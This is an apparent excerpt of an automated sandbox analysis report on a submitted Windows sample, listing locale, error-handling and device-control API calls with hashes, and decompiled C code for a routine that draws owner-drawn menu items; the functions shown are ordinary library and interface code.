Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 19731c7831be741a1976505fc92ec45d8ab0948c84cec1fe08e20adfa4af67ee
Instruction ID: 2fc35156f6c132fc4952cb08e89689de6d509f4e323082b25250ffcf4457ba44
Opcode Fuzzy Hash: 19731c7831be741a1976505fc92ec45d8ab0948c84cec1fe08e20adfa4af67ee
Instruction Fuzzy Hash: 6821987251520A9BDB189F25DD51BBB73ACEF44314F10607AFE11E6181EB74DD80C764

Uniqueness

Uniqueness Score: -1.00%

Function 00E00590 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00E0040E,00000000,00000000,?), ref: 00E005BC

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: c9a6956687a46342177d8b1ad82cd338a7ec31113a27ab78ec0b6eea5de80dd6
Instruction ID: 61349f39efcb61b183d485cc136e21844dd888d2615e2e55cf40b166ca807ab0
Opcode Fuzzy Hash: c9a6956687a46342177d8b1ad82cd338a7ec31113a27ab78ec0b6eea5de80dd6
Instruction Fuzzy Hash: DCF0CD72540115BBDF385B65CC057FE7B68EB40758F154425ED56B31C0EA74FE81C990

Uniqueness

Uniqueness Score: -1.00%

Function 00E00086 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DF4B3D: GetLastError.KERNEL32(?,00000000,?,00DE30DC,00000000,00000000,?,?,00DE295D,00000000,00000000,00000000), ref: 00DF4B42
Part of subcall function 00DF4B3D: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00DE295D,00000000,00000000,00000000), ref: 00DF4BE0

EnumSystemLocalesW.KERNEL32(00E00364,00000001,00000004,?,-00000050,?,00E00703,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00E000D0

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: afd986fa5bc5e0f0669feb1991c31c0a67e7d5e84900e8a6962c394e925f514f
Instruction ID: d5e26ef1067829168327bc1f4f6ebf42c3c8b31c4e7de9ab3f4035c656efbaf6
Opcode Fuzzy Hash: afd986fa5bc5e0f0669feb1991c31c0a67e7d5e84900e8a6962c394e925f514f
Instruction Fuzzy Hash: 01F0C2762003085FDB245F359881B7A7B95EB8076CF05882CF945AB6D0C6B19C82C650

Uniqueness

Uniqueness Score: -1.00%

Function 00DF4D9C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00DF3BEF: EnterCriticalSection.KERNEL32(?,?,00DFE27E,00000000,00E642D0,0000000C,00DFE245,?,?,00DF5683,?,?,00DF4CDF,00000001,00000364,00000006), ref: 00DF3BFE

EnumSystemLocalesW.KERNEL32(00DF4D8F,00000001,00E640D0,0000000C,00DF51FA,00000000), ref: 00DF4DD4

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: dada2fb54538312160ff6c4b84357f3cbdabf12a3c6af6582f40b6532253def8
Instruction ID: 27350f2377356f9fa2e4a21972cb988771466c80083164d7aab4248003a39692
Opcode Fuzzy Hash: dada2fb54538312160ff6c4b84357f3cbdabf12a3c6af6582f40b6532253def8
Instruction Fuzzy Hash: 60F04972A44244DFD700EF99E882BAE77F0EB48721F10811AF524EB3A1CB755944CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00DF52FE Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00DF3700,?,20001004,00000000,00000002,?,?,00DF2D0D), ref: 00DF5332

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ba33e1b32771909e2fcb340fb8865ff53377a3cb3d6317047b7689ca7665c8c4
Instruction ID: 2ebb5a997edc800ca0baf5c9f217f769b008f4c629d8dd8c98584f033b6830a0
Opcode Fuzzy Hash: ba33e1b32771909e2fcb340fb8865ff53377a3cb3d6317047b7689ca7665c8c4
Instruction Fuzzy Hash: 07E04F3154561CBBCF122F65EC05AFE7F66EF44B51F06C010FE5565225CB728A20AAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA6BF1 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

DeviceIoControl.KERNEL32 ref: 00CA6C09

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: b94ba735453c3af4684867a2e6e4fc8be57f9585775c9ea72346c8a8fb90b61a
Instruction ID: 824ee8130dc95e2528f1d1dd6cc3ba9b97b8d60ae48be1b17c1a402d94de11dc
Opcode Fuzzy Hash: b94ba735453c3af4684867a2e6e4fc8be57f9585775c9ea72346c8a8fb90b61a
Instruction Fuzzy Hash: E8C048F4EA0200BFBF01AF22ED59CB73AACE7017057085412BC48F2122C6228C48AB30

Uniqueness

Uniqueness Score: -1.00%

Function 00DE406E Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00DE41EA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: d8494b708133c7228bcacbdb0fc8ec41a48732d67d74026a152f62a8497b47ab
Instruction ID: ff7ea6de09c0c94ecd5999232d17d4aa833f04d9f6544bfc2bfe47bd025bd698
Opcode Fuzzy Hash: d8494b708133c7228bcacbdb0fc8ec41a48732d67d74026a152f62a8497b47ab
Instruction Fuzzy Hash: B651AC70600BC89BDF38BA2B89A57BF67D99F61344F1C052DEA82D73C1CA11DD858276

Uniqueness

Uniqueness Score: -1.00%

Function 00DE42A0 Relevance: 1.5, Strings: 1, Instructions: 216COMMONLIBRARYCODE

Download Yara Rule

Strings

0, xrefs: 00DE441C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 09e0eb11d67accc357d6650125733b3ac388316296941963e9ed335ace48549a
Instruction ID: 859ed722040549f4a7f34dbf8d86fea74fed791376ecdd22f925063188b1bbd8
Opcode Fuzzy Hash: 09e0eb11d67accc357d6650125733b3ac388316296941963e9ed335ace48549a
Instruction Fuzzy Hash: 7F5189307407C99ADB38BA6B84967BF679AEF42304F5C051DE682DB6C2C651DD44C33A

Uniqueness

Uniqueness Score: -1.00%

Function 00E0544A Relevance: 1.4, Strings: 1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

Strings

Kg, xrefs: 00E054AA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID: Kg
API String ID: 0-1002683172
Opcode ID: ee3b5aee76cf5c5a598d9b08bcf276758bc357f383cf99a6324a0a8bab8177cc
Instruction ID: 40e7a4817968c5c2cb9cda00dccb8d61ed807aaeb30a8ffcd108e7eebd07530e
Opcode Fuzzy Hash: ee3b5aee76cf5c5a598d9b08bcf276758bc357f383cf99a6324a0a8bab8177cc
Instruction Fuzzy Hash: 2321B673F208394B770CC47ECC5227DB6E1D78C641745423AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 00DE8A9A Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ff8d349b1c2956888d534c70504f7445670073798e82a57f06cf812278c3c1
Instruction ID: e7e882dce16194de1a1d0c24c51aa4c5bc28262def12e161a3e676bf7d7e234a
Opcode Fuzzy Hash: 07ff8d349b1c2956888d534c70504f7445670073798e82a57f06cf812278c3c1
Instruction Fuzzy Hash: D6518571E00259EFDF04DF99C981AAEBBB2FF88304F198059E409AB241C7359E51DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00E0532A Relevance: .1, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb86d4a5c24fda39a5b63c34c28ee96887ae4cd121e7a8ff1220b5f88205cbec
Instruction ID: c0166b942a66bb6c4f3cde08ad06323c64ee87e1ba604f34e24e0476f6ce25fd
Opcode Fuzzy Hash: cb86d4a5c24fda39a5b63c34c28ee96887ae4cd121e7a8ff1220b5f88205cbec
Instruction Fuzzy Hash: DD117763F30C255B675C81698C172BA95D2EBD825074F533AD826E72C4E994DE13D290

Uniqueness

Uniqueness Score: -1.00%

Function 00DE0D40 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 98d8fac5e656dfcab1cdba8629f7ddfebc154dc49d9a30dfb15ce226f2c5f5f2
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 5311D6772401C243D604AAAFCCB87BAAB95EAD532176D4365D0814BE58D1E2B5C5D720

Uniqueness

Uniqueness Score: -1.00%

Function 00CBAA19 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 427
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00CBAA19(void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t184;
				RECT* _t190;
				int _t194;
				void* _t217;
				signed char _t224;
				signed char _t232;
				struct HDC__* _t236;
				long _t251;
				long _t263;
				long _t303;
				intOrPtr _t309;
				intOrPtr* _t314;
				void* _t323;
				int _t377;
				int _t382;
				int _t383;
				signed int _t385;
				struct tagMENUITEMINFOA _t388;
				intOrPtr _t389;
				int _t393;
				int _t395;
				void* _t401;
				void* _t404;

				_t404 = __eflags;
				_t373 = __edx;
				E00DDD55F(0xe08c00, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t401 - 0x60)) = __ecx;
				_t382 =  *(_t401 + 8);
				 *(_t401 - 0x50) = _t382;
				E00CA2ABC(__ebx, _t401 - 0x48, _t382, __esi, _t404);
				 *(_t401 - 4) =  *(_t401 - 4) & 0x00000000;
				_t314 = E00CB9E13(__ebx, _t401 - 0x48, __edx, _t382, __esi, _t404,  *((intOrPtr*)(_t382 + 0x18)));
				 *0xe17a64(0xe4bcbb, 0xc4);
				_t184 =  *((intOrPtr*)( *((intOrPtr*)( *_t314 + 0x1c))))();
				_t388 = 0x30;
				 *((intOrPtr*)(_t401 - 0x68)) = _t184;
				E00DDFBE0(_t382, _t401 - 0xb8, 0, _t388);
				 *(_t401 - 0x54) =  *(_t401 - 0x54) & 0x00000000;
				 *(_t401 - 0xb8) = _t388;
				_t389 =  *((intOrPtr*)(_t401 - 0x60));
				 *((intOrPtr*)(_t401 - 0xb4)) = 0x40;
				if(GetMenuItemInfoA( *(_t389 + 4),  *(_t382 + 8), 0, _t401 - 0xb8) != 0) {
					_t309 = E00CA2BCE(_t314, _t401 - 0x48, _t389,  *((intOrPtr*)(_t401 - 0x90)));
					 *((intOrPtr*)(_t401 - 0x90)) =  *((intOrPtr*)(_t401 - 0x90)) + 1;
					 *((intOrPtr*)(_t401 - 0x94)) = _t309;
					 *(_t401 - 0x54) = GetMenuItemInfoA( *(_t389 + 4),  *(_t382 + 8), 0, _t401 - 0xb8);
					E00CA67F5(_t401 - 0x48, 0xffffffff);
				}
				_t383 =  *(_t382 + 0x2c);
				_t190 =  *(_t401 - 0x50) + 0x1c;
				 *(_t401 - 0x24) = _t190;
				 *(_t401 - 0x5c) = _t383;
				CopyRect(_t401 - 0x40, _t190);
				if(_t383 == 0 || E00CACB0B(_t383, 0xe19694) == 0) {
					_t40 = _t401 - 0x58;
					 *_t40 =  *(_t401 - 0x58) & 0x00000000;
					__eflags =  *_t40;
					 *(_t401 - 0x44) = GetSystemMetrics(0x32);
					_t194 = GetSystemMetrics(0x31);
				} else {
					 *(_t401 - 0x58) = 1;
					GetObjectA( *(_t383 + 4), 0x18, _t401 - 0xd0);
					 *(_t401 - 0x44) =  *(_t401 - 0xc8);
					_t194 =  *(_t401 - 0xcc);
				}
				 *(_t401 - 0x4c) = _t194;
				asm("cdq");
				 *(_t401 - 0x20) =  *(_t401 - 0x20) & 0x00000000;
				asm("cdq");
				_t323 = ( *((intOrPtr*)(_t401 - 0x34)) -  *((intOrPtr*)(_t401 - 0x3c)) - _t373 >> 1) - ( *(_t401 - 0x44) - _t373 >> 1) +  *((intOrPtr*)(_t401 - 0x3c));
				 *(_t401 - 0x1c) = _t323 - 1;
				 *(_t401 - 0x14) =  *(_t401 - 0x44) + _t323;
				 *(_t401 - 0x18) =  *(_t401 - 0x4c) + 1;
				 *(_t401 - 0x44) = GetSysColor(4);
				E00CB9032(_t401 - 0x88);
				 *(_t401 - 4) = 1;
				E00CB9B84(_t314, _t401 - 0x88, CreateCompatibleDC(0));
				 *0xe17a64( *((intOrPtr*)(_t401 - 0x60)) + 8);
				 *((intOrPtr*)( *((intOrPtr*)( *_t314 + 0x28))))();
				_t217 = E00CBAFB7(_t314, _t401 - 0x64, _t401 - 0x48);
				_t391 =  *(_t401 - 0x50);
				 *(_t401 - 0x4c) =  *(_t217 + 4);
				if(( *(_t391 + 0x10) & 0x00000001) == 0) {
					E00CC0A96(_t314, _t314, _t383, _t391,  *(_t401 - 0x24));
					_t391 =  *( *_t314 + 0x2c);
					 *0xe17a64( *(_t401 - 0x44),  *(_t401 - 0x44));
					 *( *( *_t314 + 0x2c))();
					_t224 =  *( *(_t401 - 0x50) + 0x10);
					__eflags = _t224 & 0x00000002;
					if((_t224 & 0x00000002) == 0) {
						__eflags =  *(_t401 - 0x58);
						if( *(_t401 - 0x58) != 0) {
							__eflags = _t224 & 0x00000008;
							if((_t224 & 0x00000008) != 0) {
								_t391 = GetSysColor(0x14);
								_t263 = GetSysColor(0x10);
								_t373 =  *(_t401 - 0x14) -  *(_t401 - 0x1c) + 1;
								__eflags =  *(_t401 - 0x18) -  *(_t401 - 0x20) + 1;
								E00CC06E8(_t314,  *(_t401 - 0x18) -  *(_t401 - 0x20) + 1,  *(_t401 - 0x20),  *(_t401 - 0x1c),  *(_t401 - 0x18) -  *(_t401 - 0x20) + 1, _t373, _t263, _t262);
							}
						}
						__eflags =  *(_t401 - 0x54);
						if(__eflags == 0) {
							goto L24;
						} else {
							 *0xe17a64( *(_t401 - 0x44));
							 *( *( *_t314 + 0x2c))();
							_push(7);
							_t395 =  *( *_t314 + 0x30);
							goto L22;
						}
					}
					_t391 =  *( *_t314 + 0x30);
					 *0xe17a64(GetSysColor(0x14));
					 *( *( *_t314 + 0x30))();
					E00CBA3B4(_t314, 1);
					__eflags =  *(_t401 - 0x54);
					if(__eflags != 0) {
						asm("cdq");
						asm("cdq");
						_t385 =  *(_t401 - 0x4c) - _t373 >> 1;
						_t377 =  *(_t401 - 0x1c) + 1 + ( *(_t401 - 0x14) -  *(_t401 - 0x1c) - _t373 >> 1) - _t385;
						ExtTextOutA( *(_t314 + 4),  *(_t401 - 0x18) + 4, _t377, 2, 0,  *(_t401 - 0x48),  *( *(_t401 - 0x48) - 0xc), 0);
						_t391 =  *( *_t314 + 0x30);
						 *0xe17a64(GetSysColor(0x11));
						 *( *( *_t314 + 0x30))();
						asm("cdq");
						_t373 =  *(_t401 - 0x18) + 3;
						ExtTextOutA( *(_t314 + 4),  *(_t401 - 0x18) + 3, ( *(_t401 - 0x14) -  *(_t401 - 0x1c) - _t377 >> 1) - _t385 +  *(_t401 - 0x1c), 0, 0,  *(_t401 - 0x48),  *( *(_t401 - 0x48) - 0xc), 0);
						_t383 =  *(_t401 - 0x5c);
					}
					goto L24;
				} else {
					CopyRect(_t401 - 0x30, _t391 + 0x1c);
					 *(_t401 - 0x30) =  *(_t401 - 0x18) + 2;
					_push(GetSysColor(0xd));
					E00CC0A96(_t314, _t314, _t383, _t391, _t401 - 0x30);
					if( *(_t401 - 0x58) != 0 && ( *(_t391 + 0x10) & 0x0000000a) == 0) {
						_t391 = GetSysColor(0x10);
						_t303 = GetSysColor(0x14);
						_t373 =  *(_t401 - 0x14) -  *(_t401 - 0x1c) + 1;
						E00CC06E8(_t314,  *(_t401 - 0x18) -  *(_t401 - 0x20) + 1,  *(_t401 - 0x20),  *(_t401 - 0x1c),  *(_t401 - 0x18) -  *(_t401 - 0x20) + 1, _t373, _t303, _t302);
					}
					if( *(_t401 - 0x54) == 0) {
						L24:
						if( *(_t401 - 0x58) == 0) {
							L34:
							 *0xe17a64( *((intOrPtr*)(_t401 - 0x68)));
							 *((intOrPtr*)( *((intOrPtr*)( *_t314 + 0x20))))();
							E00CA2975(E00CB91A4(_t401 - 0x88),  *(_t401 - 0x48) - 0x10);
							return E00DDD50E(_t314, _t383,  *((intOrPtr*)( *_t314 + 0x20)));
						}
						 *(_t401 - 0x24) =  *(_t401 - 0x24) & 0x00000000;
						 *(_t401 - 0x28) = 0xe196b4;
						 *(_t401 - 4) = 2;
						_t232 =  *( *(_t401 - 0x50) + 0x10);
						_t417 = _t232 & 0x00000002;
						if((_t232 & 0x00000002) == 0) {
							__eflags = _t232 & 0x00000008;
							if(__eflags == 0) {
								_t393 =  *(_t401 - 0x5c);
								L31:
								E00CB9032(_t401 - 0x78);
								_t383 = 0;
								 *(_t401 - 4) = 3;
								E00CB9B84(_t314, _t401 - 0x78, CreateCompatibleDC(0));
								_t236 = 0;
								if(_t393 != 0) {
									_t161 = _t393 + 4; // 0xcb93b4
									_t236 =  *_t161;
								}
								E00CBA251( *(_t401 - 0x74), _t236);
								InflateRect(_t401 - 0x20, 0xffffffff, 0xffffffff);
								BitBlt( *(_t314 + 4),  *(_t401 - 0x20),  *(_t401 - 0x1c),  *(_t401 - 0x18),  *(_t401 - 0x14),  *(_t401 - 0x74), _t383, _t383, 0xcc0020);
								E00CB91A4(_t401 - 0x78);
								 *(_t401 - 4) = 1;
								 *(_t401 - 0x28) = 0xe196b4;
								E00CB91F0(_t401 - 0x28, _t373);
								goto L34;
							}
							_push(0xffffff);
							_push( *(_t401 - 0x44));
							_push(_t401 - 0x28);
							_push(_t383);
							E00CB9546(_t314, _t373, _t383, _t391, __eflags);
							L27:
							_t393 = _t401 - 0x28;
							goto L31;
						}
						_push( *(_t401 - 0x44));
						_push(_t401 - 0x28);
						_push(_t383);
						E00CB989B(_t314, _t373, _t383, _t391, _t417);
						goto L27;
					} else {
						 *0xe17a64(GetSysColor(0xd));
						 *( *( *_t314 + 0x2c))();
						_t395 =  *( *_t314 + 0x30);
						if(( *( *(_t401 - 0x50) + 0x10) & 0x00000002) == 0) {
							_push(0xe);
							L22:
							_t251 = GetSysColor();
							L23:
							 *0xe17a64(_t251);
							 *_t395();
							asm("cdq");
							asm("cdq");
							_t391 = ( *(_t401 - 0x14) -  *(_t401 - 0x1c) - _t373 >> 1) - ( *(_t401 - 0x4c) - _t373 >> 1) +  *(_t401 - 0x1c);
							ExtTextOutA( *(_t314 + 4),  *(_t401 - 0x18) + 3, ( *(_t401 - 0x14) -  *(_t401 - 0x1c) - _t373 >> 1) - ( *(_t401 - 0x4c) - _t373 >> 1) +  *(_t401 - 0x1c), 2, 0,  *(_t401 - 0x48),  *( *(_t401 - 0x48) - 0xc), 0);
							goto L24;
						}
						_t251 =  *(_t401 - 0x44);
						goto L23;
					}
				}
			}

0x00cbaa19
0x00cbaa19
0x00cbaa23
0x00cbaa28
0x00cbaa2b
0x00cbaa36
0x00cbaa39
0x00cbaa41
0x00cbaa4a
0x00cbaa53
0x00cbaa5b
0x00cbaa5f
0x00cbaa61
0x00cbaa6d
0x00cbaa72
0x00cbaa7f
0x00cbaa85
0x00cbaa88
0x00cbaaa3
0x00cbaaae
0x00cbaab3
0x00cbaab9
0x00cbaad9
0x00cbaadc
0x00cbaadc
0x00cbaae4
0x00cbaae7
0x00cbaaeb
0x00cbaaf2
0x00cbaaf5
